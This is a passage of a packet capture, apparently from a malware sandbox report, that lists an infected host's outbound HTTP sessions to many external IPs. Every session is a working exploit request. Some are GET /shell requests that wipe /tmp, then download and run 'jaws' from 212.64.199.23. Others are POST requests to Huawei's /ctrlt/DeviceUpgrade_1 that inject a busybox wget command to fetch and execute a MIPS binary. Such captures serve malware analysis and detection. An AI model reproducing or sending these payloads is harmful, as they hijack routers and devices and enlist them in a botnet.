                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          105192.168.2.155346435.94.114.16180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.863836050 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          106192.168.2.154206479.68.93.2380
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.865609884 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          107192.168.2.1541752180.247.222.11980
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.895857096 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          108192.168.2.1556602126.182.35.20580
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.897378922 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          109192.168.2.1546724206.199.245.3680
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.927592993 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          110192.168.2.156008640.54.178.14180
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.959563971 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          111192.168.2.153651493.55.208.18480
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:19.960690975 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          112192.168.2.1540888197.51.196.23237215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.440680027 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          113192.168.2.1540176144.229.87.24280
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.441565037 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          114192.168.2.1558574204.137.209.7580
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.443483114 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          115192.168.2.154019225.68.126.5080
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.445096970 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          116192.168.2.1539428183.119.84.21480
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.446342945 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          117192.168.2.154562042.210.68.20780
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.447731972 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          118192.168.2.153401240.144.172.480
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.448945045 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          119192.168.2.155944054.197.207.1380
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.471524000 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 212.64.199.23/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          120192.168.2.1538700197.211.217.17437215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.585052013 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          121192.168.2.1535342197.165.49.3137215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.586008072 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          122192.168.2.153398241.247.70.437215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.587130070 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          123192.168.2.1555982197.229.162.8237215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.588567972 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          124192.168.2.1534772156.229.156.2537215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.589695930 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          125192.168.2.1543636197.225.24.5537215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.590960979 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          126192.168.2.153456441.160.92.13937215
                                                          TimestampBytes transferredDirectionData
                                                          Feb 4, 2025 18:11:20.592108011 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
